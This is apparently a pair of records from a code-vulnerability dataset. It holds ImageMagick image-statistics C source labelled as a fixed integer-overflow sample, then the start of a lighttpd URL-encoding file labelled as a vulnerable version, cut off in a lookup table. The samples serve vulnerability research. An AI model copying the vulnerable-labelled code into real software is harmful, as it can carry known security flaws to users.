area=PerceptibleReciprocal((double) channels*image->columns*image->rows);
channel_statistics[i].variance=channel_statistics[i].sum_squared;
channel_statistics[i].mean=channel_statistics[i].sum;
standard_deviation=sqrt(channel_statistics[i].variance-
(channel_statistics[i].mean*channel_statistics[i].mean));
standard_deviation=sqrt(PerceptibleReciprocal((double) channels*
image->columns*image->rows-1.0)*channels*image->columns*image->rows*
standard_deviation*standard_deviation);
channel_statistics[i].standard_deviation=standard_deviation;
for (i=0; i <= (ssize_t) CompositeChannels; i++)
{
/*
Compute kurtosis & skewness statistics.
*/
standard_deviation=PerceptibleReciprocal(
channel_statistics[i].standard_deviation);
channel_statistics[i].skewness=(channel_statistics[i].sum_cubed-3.0*
channel_statistics[i].mean*channel_statistics[i].sum_squared+2.0*
channel_statistics[i].mean*channel_statistics[i].mean*
channel_statistics[i].mean)*(standard_deviation*standard_deviation*
standard_deviation);
channel_statistics[i].kurtosis=(channel_statistics[i].sum_fourth_power-4.0*
channel_statistics[i].mean*channel_statistics[i].sum_cubed+6.0*
channel_statistics[i].mean*channel_statistics[i].mean*
channel_statistics[i].sum_squared-3.0*channel_statistics[i].mean*
channel_statistics[i].mean*channel_statistics[i].mean*
channel_statistics[i].mean)*(standard_deviation*standard_deviation*
standard_deviation*standard_deviation)-3.0;
}
channel_statistics[CompositeChannels].mean=0.0;
channel_statistics[CompositeChannels].standard_deviation=0.0;
for (i=0; i < (ssize_t) CompositeChannels; i++)
{
channel_statistics[CompositeChannels].mean+=
channel_statistics[i].mean;
channel_statistics[CompositeChannels].standard_deviation+=
channel_statistics[i].standard_deviation;
}
channel_statistics[CompositeChannels].mean/=(double) channels;
channel_statistics[CompositeChannels].standard_deviation/=(double) channels;
histogram=(MagickPixelPacket *) RelinquishMagickMemory(histogram);
if (y < (ssize_t) image->rows)
channel_statistics=(ChannelStatistics *) RelinquishMagickMemory(
channel_statistics);
return(channel_statistics);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% P o l y n o m i a l I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% PolynomialImage() returns a new image where each pixel is the sum of the
% pixels in the image sequence after applying its corresponding terms
% (coefficient and degree pairs).
%
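% For example, to average the first two images in a sequence, pass one
% (coefficient,degree) pair per image (an illustrative sketch; `images' and
% `exception' are assumed to be valid):
%
% const double terms[] = { 0.5, 1.0, 0.5, 1.0 };
% Image *average_image;
%
% average_image=PolynomialImage(images,2,terms,exception);
%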
% The format of the PolynomialImage method is:
%
% Image *PolynomialImage(const Image *images,const size_t number_terms,
% const double *terms,ExceptionInfo *exception)
% Image *PolynomialImageChannel(const Image *images,
% const ChannelType channel,const size_t number_terms,
% const double *terms,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o images: the image sequence.
%
% o channel: the channel.
%
% o number_terms: the number of terms in the list. The actual list length
% is 2 x number_terms + 1 (the constant).
%
% o terms: the list of polynomial coefficients and degree pairs and a
% constant.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport Image *PolynomialImage(const Image *images,
const size_t number_terms,const double *terms,ExceptionInfo *exception)
{
Image
*polynomial_image;
polynomial_image=PolynomialImageChannel(images,DefaultChannels,number_terms,
terms,exception);
return(polynomial_image);
}
MagickExport Image *PolynomialImageChannel(const Image *images,
const ChannelType channel,const size_t number_terms,const double *terms,
ExceptionInfo *exception)
{
#define PolynomialImageTag "Polynomial/Image"
CacheView
*polynomial_view;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
progress;
MagickPixelPacket
**magick_restrict polynomial_pixels,
zero;
ssize_t
y;
assert(images != (Image *) NULL);
assert(images->signature == MagickCoreSignature);
if (images->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",images->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImageCanvas(images,exception);
if (image == (Image *) NULL)
return((Image *) NULL);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
image=DestroyImage(image);
return((Image *) NULL);
}
polynomial_pixels=AcquirePixelThreadSet(images);
if (polynomial_pixels == (MagickPixelPacket **) NULL)
{
image=DestroyImage(image);
(void) ThrowMagickException(exception,GetMagickModule(),
ResourceLimitError,"MemoryAllocationFailed","`%s'",images->filename);
return((Image *) NULL);
}
/*
Polynomial image pixels.
*/
status=MagickTrue;
progress=0;
GetMagickPixelPacket(images,&zero);
polynomial_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
CacheView
*image_view;
const Image
*next;
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict polynomial_indexes;
register MagickPixelPacket
*polynomial_pixel;
register PixelPacket
*magick_restrict q;
register ssize_t
i,
x;
size_t
number_images;
if (status == MagickFalse)
continue;
q=QueueCacheViewAuthenticPixels(polynomial_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
polynomial_indexes=GetCacheViewAuthenticIndexQueue(polynomial_view);
polynomial_pixel=polynomial_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
polynomial_pixel[x]=zero;
next=images;
number_images=GetImageListLength(images);
for (i=0; i < (ssize_t) number_images; i++)
{
register const IndexPacket
*indexes;
register const PixelPacket
*p;
if (i >= (ssize_t) number_terms)
break;
image_view=AcquireVirtualCacheView(next,exception);
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const PixelPacket *) NULL)
{
image_view=DestroyCacheView(image_view);
break;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
double
coefficient,
degree;
coefficient=terms[i << 1];
degree=terms[(i << 1)+1];
if ((channel & RedChannel) != 0)
polynomial_pixel[x].red+=coefficient*pow(QuantumScale*p->red,degree);
if ((channel & GreenChannel) != 0)
polynomial_pixel[x].green+=coefficient*pow(QuantumScale*p->green,
degree);
if ((channel & BlueChannel) != 0)
polynomial_pixel[x].blue+=coefficient*pow(QuantumScale*p->blue,
degree);
if ((channel & OpacityChannel) != 0)
polynomial_pixel[x].opacity+=coefficient*pow(QuantumScale*
(QuantumRange-p->opacity),degree);
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
polynomial_pixel[x].index+=coefficient*pow(QuantumScale*indexes[x],
degree);
p++;
}
image_view=DestroyCacheView(image_view);
next=GetNextImageInList(next);
}
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelRed(q,ClampToQuantum(QuantumRange*polynomial_pixel[x].red));
SetPixelGreen(q,ClampToQuantum(QuantumRange*polynomial_pixel[x].green));
SetPixelBlue(q,ClampToQuantum(QuantumRange*polynomial_pixel[x].blue));
if (image->matte == MagickFalse)
SetPixelOpacity(q,ClampToQuantum(QuantumRange-QuantumRange*
polynomial_pixel[x].opacity));
else
SetPixelAlpha(q,ClampToQuantum(QuantumRange-QuantumRange*
polynomial_pixel[x].opacity));
if (image->colorspace == CMYKColorspace)
SetPixelIndex(polynomial_indexes+x,ClampToQuantum(QuantumRange*
polynomial_pixel[x].index));
q++;
}
if (SyncCacheViewAuthenticPixels(polynomial_view,exception) == MagickFalse)
status=MagickFalse;
if (images->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(images,PolynomialImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
polynomial_view=DestroyCacheView(polynomial_view);
polynomial_pixels=DestroyPixelThreadSet(images,polynomial_pixels);
if (status == MagickFalse)
image=DestroyImage(image);
return(image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S t a t i s t i c I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% StatisticImage() makes each pixel the min / max / median / mode / etc. of
% the neighborhood of the specified width and height.
%
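% For example, to replace each pixel with the median of its 3x3 neighborhood
% (an illustrative sketch; `image' and `exception' are assumed to be valid):
%
% Image *median_image;
%
% median_image=StatisticImage(image,MedianStatistic,3,3,exception);
%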
% The format of the StatisticImage method is:
%
% Image *StatisticImage(const Image *image,const StatisticType type,
% const size_t width,const size_t height,ExceptionInfo *exception)
% Image *StatisticImageChannel(const Image *image,
% const ChannelType channel,const StatisticType type,
% const size_t width,const size_t height,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the image channel.
%
% o type: the statistic type (median, mode, etc.).
%
% o width: the width of the pixel neighborhood.
%
% o height: the height of the pixel neighborhood.
%
% o exception: return any errors or warnings in this structure.
%
*/
#define ListChannels 5
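/*
Each PixelList keeps one skip-list per channel (red, green, blue, opacity,
index).  A skip-list node is indexed by a 16-bit sample value and records how
many pixels of the current neighborhood carry that value; node 65536 acts as
the sentinel/root.  Traversing the list in order lets the statistic helpers
below extract the minimum, maximum, mean, median, mode, and non-peak values
cheaply.
*/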
typedef struct _ListNode
{
size_t
next[9],
count,
signature;
} ListNode;
typedef struct _SkipList
{
ssize_t
level;
ListNode
*nodes;
} SkipList;
typedef struct _PixelList
{
size_t
length,
seed,
signature;
SkipList
lists[ListChannels];
} PixelList;
static PixelList *DestroyPixelList(PixelList *pixel_list)
{
register ssize_t
i;
if (pixel_list == (PixelList *) NULL)
return((PixelList *) NULL);
for (i=0; i < ListChannels; i++)
if (pixel_list->lists[i].nodes != (ListNode *) NULL)
pixel_list->lists[i].nodes=(ListNode *) RelinquishAlignedMemory(
pixel_list->lists[i].nodes);
pixel_list=(PixelList *) RelinquishMagickMemory(pixel_list);
return(pixel_list);
}
static PixelList **DestroyPixelListThreadSet(PixelList **pixel_list)
{
register ssize_t
i;
assert(pixel_list != (PixelList **) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (pixel_list[i] != (PixelList *) NULL)
pixel_list[i]=DestroyPixelList(pixel_list[i]);
pixel_list=(PixelList **) RelinquishMagickMemory(pixel_list);
return(pixel_list);
}
static PixelList *AcquirePixelList(const size_t width,const size_t height)
{
PixelList
*pixel_list;
register ssize_t
i;
pixel_list=(PixelList *) AcquireMagickMemory(sizeof(*pixel_list));
if (pixel_list == (PixelList *) NULL)
return(pixel_list);
(void) memset((void *) pixel_list,0,sizeof(*pixel_list));
pixel_list->length=width*height;
for (i=0; i < ListChannels; i++)
{
pixel_list->lists[i].nodes=(ListNode *) AcquireAlignedMemory(65537UL,
sizeof(*pixel_list->lists[i].nodes));
if (pixel_list->lists[i].nodes == (ListNode *) NULL)
return(DestroyPixelList(pixel_list));
(void) memset(pixel_list->lists[i].nodes,0,65537UL*
sizeof(*pixel_list->lists[i].nodes));
}
pixel_list->signature=MagickCoreSignature;
return(pixel_list);
}
static PixelList **AcquirePixelListThreadSet(const size_t width,
const size_t height)
{
PixelList
**pixel_list;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
pixel_list=(PixelList **) AcquireQuantumMemory(number_threads,
sizeof(*pixel_list));
if (pixel_list == (PixelList **) NULL)
return((PixelList **) NULL);
(void) memset(pixel_list,0,number_threads*sizeof(*pixel_list));
for (i=0; i < (ssize_t) number_threads; i++)
{
pixel_list[i]=AcquirePixelList(width,height);
if (pixel_list[i] == (PixelList *) NULL)
return(DestroyPixelListThreadSet(pixel_list));
}
return(pixel_list);
}
static void AddNodePixelList(PixelList *pixel_list,const ssize_t channel,
const size_t color)
{
register SkipList
*list;
register ssize_t
level;
size_t
search,
update[9];
/*
Initialize the node.
*/
list=pixel_list->lists+channel;
list->nodes[color].signature=pixel_list->signature;
list->nodes[color].count=1;
/*
Determine where it belongs in the list.
*/
search=65536UL;
for (level=list->level; level >= 0; level--)
{
while (list->nodes[search].next[level] < color)
search=list->nodes[search].next[level];
update[level]=search;
}
/*
Generate a pseudo-random level for this node.
*/
for (level=0; ; level++)
{
pixel_list->seed=(pixel_list->seed*42893621L)+1L;
if ((pixel_list->seed & 0x300) != 0x300)
break;
}
if (level > 8)
level=8;
if (level > (list->level+2))
level=list->level+2;
/*
If we're raising the list's level, link back to the root node.
*/
while (level > list->level)
{
list->level++;
update[list->level]=65536UL;
}
/*
Link the node into the skip-list.
*/
do
{
list->nodes[color].next[level]=list->nodes[update[level]].next[level];
list->nodes[update[level]].next[level]=color;
} while (level-- > 0);
}
static void GetMaximumPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
maximum;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the maximum value for each of the colors.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
maximum=list->nodes[color].next[0];
do
{
color=list->nodes[color].next[0];
if (color > maximum)
maximum=color;
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
channels[channel]=(unsigned short) maximum;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetMeanPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
MagickRealType
sum;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the mean value for each of the colors.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
do
{
color=list->nodes[color].next[0];
sum+=(MagickRealType) list->nodes[color].count*color;
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
channels[channel]=(unsigned short) sum;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetMedianPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the median value for each color channel.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
do
{
color=list->nodes[color].next[0];
count+=list->nodes[color].count;
} while (count <= (ssize_t) (pixel_list->length >> 1));
channels[channel]=(unsigned short) color;
}
GetMagickPixelPacket((const Image *) NULL,pixel);
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetMinimumPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
minimum;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the minimum value for each color channel.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
count=0;
color=65536UL;
minimum=list->nodes[color].next[0];
do
{
color=list->nodes[color].next[0];
if (color < minimum)
minimum=color;
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
channels[channel]=(unsigned short) minimum;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetModePixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
max_count,
mode;
ssize_t
count;
unsigned short
channels[5];
/*
Make each pixel the 'predominant color' of the specified neighborhood.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
mode=color;
max_count=list->nodes[mode].count;
count=0;
do
{
color=list->nodes[color].next[0];
if (list->nodes[color].count > max_count)
{
mode=color;
max_count=list->nodes[mode].count;
}
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
channels[channel]=(unsigned short) mode;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetNonpeakPixelList(PixelList *pixel_list,MagickPixelPacket *pixel)
{
register SkipList
*list;
register ssize_t
channel;
size_t
color,
next,
previous;
ssize_t
count;
unsigned short
channels[5];
/*
Find the non-peak value for each color channel.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
next=list->nodes[color].next[0];
count=0;
do
{
previous=color;
color=next;
next=list->nodes[color].next[0];
count+=list->nodes[color].count;
} while (count <= (ssize_t) (pixel_list->length >> 1));
if ((previous == 65536UL) && (next != 65536UL))
color=next;
else
if ((previous != 65536UL) && (next == 65536UL))
color=previous;
channels[channel]=(unsigned short) color;
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetRootMeanSquarePixelList(PixelList *pixel_list,
MagickPixelPacket *pixel)
{
MagickRealType
sum;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the root mean square value for each color channel.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
do
{
color=list->nodes[color].next[0];
sum+=(MagickRealType) (list->nodes[color].count*color*color);
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
channels[channel]=(unsigned short) sqrt(sum);
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static void GetStandardDeviationPixelList(PixelList *pixel_list,
MagickPixelPacket *pixel)
{
MagickRealType
sum,
sum_squared;
register SkipList
*list;
register ssize_t
channel;
size_t
color;
ssize_t
count;
unsigned short
channels[ListChannels];
/*
Find the standard deviation for each color channel.
*/
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
color=65536L;
count=0;
sum=0.0;
sum_squared=0.0;
do
{
register ssize_t
i;
color=list->nodes[color].next[0];
sum+=(MagickRealType) list->nodes[color].count*color;
for (i=0; i < (ssize_t) list->nodes[color].count; i++)
sum_squared+=((MagickRealType) color)*((MagickRealType) color);
count+=list->nodes[color].count;
} while (count < (ssize_t) pixel_list->length);
sum/=pixel_list->length;
sum_squared/=pixel_list->length;
channels[channel]=(unsigned short) sqrt(sum_squared-(sum*sum));
}
pixel->red=(MagickRealType) ScaleShortToQuantum(channels[0]);
pixel->green=(MagickRealType) ScaleShortToQuantum(channels[1]);
pixel->blue=(MagickRealType) ScaleShortToQuantum(channels[2]);
pixel->opacity=(MagickRealType) ScaleShortToQuantum(channels[3]);
pixel->index=(MagickRealType) ScaleShortToQuantum(channels[4]);
}
static inline void InsertPixelList(const Image *image,const PixelPacket *pixel,
const IndexPacket *indexes,PixelList *pixel_list)
{
size_t
signature;
unsigned short
index;
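/*
Each of the five skip-lists is a sparse histogram of 16-bit channel values.
A node whose signature differs from the list's current signature is a stale
entry left over from a previous neighborhood and is re-initialized by
AddNodePixelList().
*/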
index=ScaleQuantumToShort(GetPixelRed(pixel));
signature=pixel_list->lists[0].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[0].nodes[index].count++;
else
AddNodePixelList(pixel_list,0,index);
index=ScaleQuantumToShort(GetPixelGreen(pixel));
signature=pixel_list->lists[1].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[1].nodes[index].count++;
else
AddNodePixelList(pixel_list,1,index);
index=ScaleQuantumToShort(GetPixelBlue(pixel));
signature=pixel_list->lists[2].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[2].nodes[index].count++;
else
AddNodePixelList(pixel_list,2,index);
index=ScaleQuantumToShort(GetPixelOpacity(pixel));
signature=pixel_list->lists[3].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[3].nodes[index].count++;
else
AddNodePixelList(pixel_list,3,index);
if (image->colorspace == CMYKColorspace)
index=ScaleQuantumToShort(GetPixelIndex(indexes));
signature=pixel_list->lists[4].nodes[index].signature;
if (signature == pixel_list->signature)
pixel_list->lists[4].nodes[index].count++;
else
AddNodePixelList(pixel_list,4,index);
}
static void ResetPixelList(PixelList *pixel_list)
{
int
level;
register ListNode
*root;
register SkipList
*list;
register ssize_t
channel;
/*
Reset the skip-list.
*/
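/*
Only the root node and the list level are reset here; stale nodes are
invalidated lazily by the signature comparison in InsertPixelList().
*/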
for (channel=0; channel < 5; channel++)
{
list=pixel_list->lists+channel;
root=list->nodes+65536UL;
list->level=0;
for (level=0; level < 9; level++)
root->next[level]=65536UL;
}
pixel_list->seed=pixel_list->signature++;
}
MagickExport Image *StatisticImage(const Image *image,const StatisticType type,
const size_t width,const size_t height,ExceptionInfo *exception)
{
Image
*statistic_image;
statistic_image=StatisticImageChannel(image,DefaultChannels,type,width,
height,exception);
return(statistic_image);
}
MagickExport Image *StatisticImageChannel(const Image *image,
const ChannelType channel,const StatisticType type,const size_t width,
const size_t height,ExceptionInfo *exception)
{
#define StatisticImageTag "Statistic/Image"
CacheView
*image_view,
*statistic_view;
Image
*statistic_image;
MagickBooleanType
status;
MagickOffsetType
progress;
PixelList
**magick_restrict pixel_list;
size_t
neighbor_height,
neighbor_width;
ssize_t
y;
/*
Initialize statistics image attributes.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
statistic_image=CloneImage(image,0,0,MagickTrue,exception);
if (statistic_image == (Image *) NULL)
return((Image *) NULL);
if (SetImageStorageClass(statistic_image,DirectClass) == MagickFalse)
{
InheritException(exception,&statistic_image->exception);
statistic_image=DestroyImage(statistic_image);
return((Image *) NULL);
}
neighbor_width=width == 0 ? GetOptimalKernelWidth2D((double) width,0.5) :
width;
neighbor_height=height == 0 ? GetOptimalKernelWidth2D((double) height,0.5) :
height;
pixel_list=AcquirePixelListThreadSet(neighbor_width,neighbor_height);
if (pixel_list == (PixelList **) NULL)
{
statistic_image=DestroyImage(statistic_image);
ThrowImageException(ResourceLimitError,"MemoryAllocationFailed");
}
/*
Make each pixel the min / max / median / mode / etc. of the neighborhood.
*/
status=MagickTrue;
progress=0;
image_view=AcquireVirtualCacheView(image,exception);
statistic_view=AcquireAuthenticCacheView(statistic_image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,statistic_image,statistic_image->rows,1)
#endif
for (y=0; y < (ssize_t) statistic_image->rows; y++)
{
const int
id = GetOpenMPThreadId();
register const IndexPacket
*magick_restrict indexes;
register const PixelPacket
*magick_restrict p;
register IndexPacket
*magick_restrict statistic_indexes;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
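/*
Request a virtual pixel region widened by the neighborhood so every output
pixel in this row can read its full width x height window.
*/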
p=GetCacheViewVirtualPixels(image_view,-((ssize_t) neighbor_width/2L),y-
(ssize_t) (neighbor_height/2L),image->columns+neighbor_width,
neighbor_height,exception);
q=QueueCacheViewAuthenticPixels(statistic_view,0,y,statistic_image->columns,1,exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
statistic_indexes=GetCacheViewAuthenticIndexQueue(statistic_view);
for (x=0; x < (ssize_t) statistic_image->columns; x++)
{
MagickPixelPacket
pixel;
register const IndexPacket
*magick_restrict s;
register const PixelPacket
*magick_restrict r;
register ssize_t
u,
v;
r=p;
s=indexes+x;
ResetPixelList(pixel_list[id]);
for (v=0; v < (ssize_t) neighbor_height; v++)
{
for (u=0; u < (ssize_t) neighbor_width; u++)
InsertPixelList(image,r+u,s+u,pixel_list[id]);
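/* advance to the next row of the padded virtual pixel region */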
r+=image->columns+neighbor_width;
s+=image->columns+neighbor_width;
}
GetMagickPixelPacket(image,&pixel);
SetMagickPixelPacket(image,p+neighbor_width*neighbor_height/2,indexes+x+
neighbor_width*neighbor_height/2,&pixel);
switch (type)
{
case GradientStatistic:
{
MagickPixelPacket
maximum,
minimum;
GetMinimumPixelList(pixel_list[id],&pixel);
minimum=pixel;
GetMaximumPixelList(pixel_list[id],&pixel);
maximum=pixel;
pixel.red=MagickAbsoluteValue(maximum.red-minimum.red);
pixel.green=MagickAbsoluteValue(maximum.green-minimum.green);
pixel.blue=MagickAbsoluteValue(maximum.blue-minimum.blue);
pixel.opacity=MagickAbsoluteValue(maximum.opacity-minimum.opacity);
if (image->colorspace == CMYKColorspace)
pixel.index=MagickAbsoluteValue(maximum.index-minimum.index);
break;
}
case MaximumStatistic:
{
GetMaximumPixelList(pixel_list[id],&pixel);
break;
}
case MeanStatistic:
{
GetMeanPixelList(pixel_list[id],&pixel);
break;
}
case MedianStatistic:
default:
{
GetMedianPixelList(pixel_list[id],&pixel);
break;
}
case MinimumStatistic:
{
GetMinimumPixelList(pixel_list[id],&pixel);
break;
}
case ModeStatistic:
{
GetModePixelList(pixel_list[id],&pixel);
break;
}
case NonpeakStatistic:
{
GetNonpeakPixelList(pixel_list[id],&pixel);
break;
}
case RootMeanSquareStatistic:
{
GetRootMeanSquarePixelList(pixel_list[id],&pixel);
break;
}
case StandardDeviationStatistic:
{
GetStandardDeviationPixelList(pixel_list[id],&pixel);
break;
}
}
if ((channel & RedChannel) != 0)
SetPixelRed(q,ClampToQuantum(pixel.red));
if ((channel & GreenChannel) != 0)
SetPixelGreen(q,ClampToQuantum(pixel.green));
if ((channel & BlueChannel) != 0)
SetPixelBlue(q,ClampToQuantum(pixel.blue));
if ((channel & OpacityChannel) != 0)
SetPixelOpacity(q,ClampToQuantum(pixel.opacity));
if (((channel & IndexChannel) != 0) &&
(image->colorspace == CMYKColorspace))
SetPixelIndex(statistic_indexes+x,ClampToQuantum(pixel.index));
p++;
q++;
}
if (SyncCacheViewAuthenticPixels(statistic_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,StatisticImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
statistic_view=DestroyCacheView(statistic_view);
image_view=DestroyCacheView(image_view);
pixel_list=DestroyPixelListThreadSet(pixel_list);
if (status == MagickFalse)
statistic_image=DestroyImage(statistic_image);
return(statistic_image);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_4425_0 |
crossvul-cpp_data_bad_797_0 | #include "first.h"
#include "burl.h"
#include <string.h>
#include "buffer.h"
#include "base64.h"
static const char hex_chars_uc[] = "0123456789ABCDEF";
/* everything except: ! $ & ' ( ) * + , - . / 0-9 : ; = ? @ A-Z _ a-z ~ */
static const char encoded_chars_http_uri_reqd[] = {
/*
0 1 2 3 4 5 6 7 8 9 A B C D E F
*/
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 00 - 0F control chars */
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, /* 10 - 1F */
1, 0, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 20 - 2F space " # % */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, /* 30 - 3F < > */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 40 - 4F */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, /* 50 - 5F [ \ ] ^ */
1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* 60 - 6F ` */
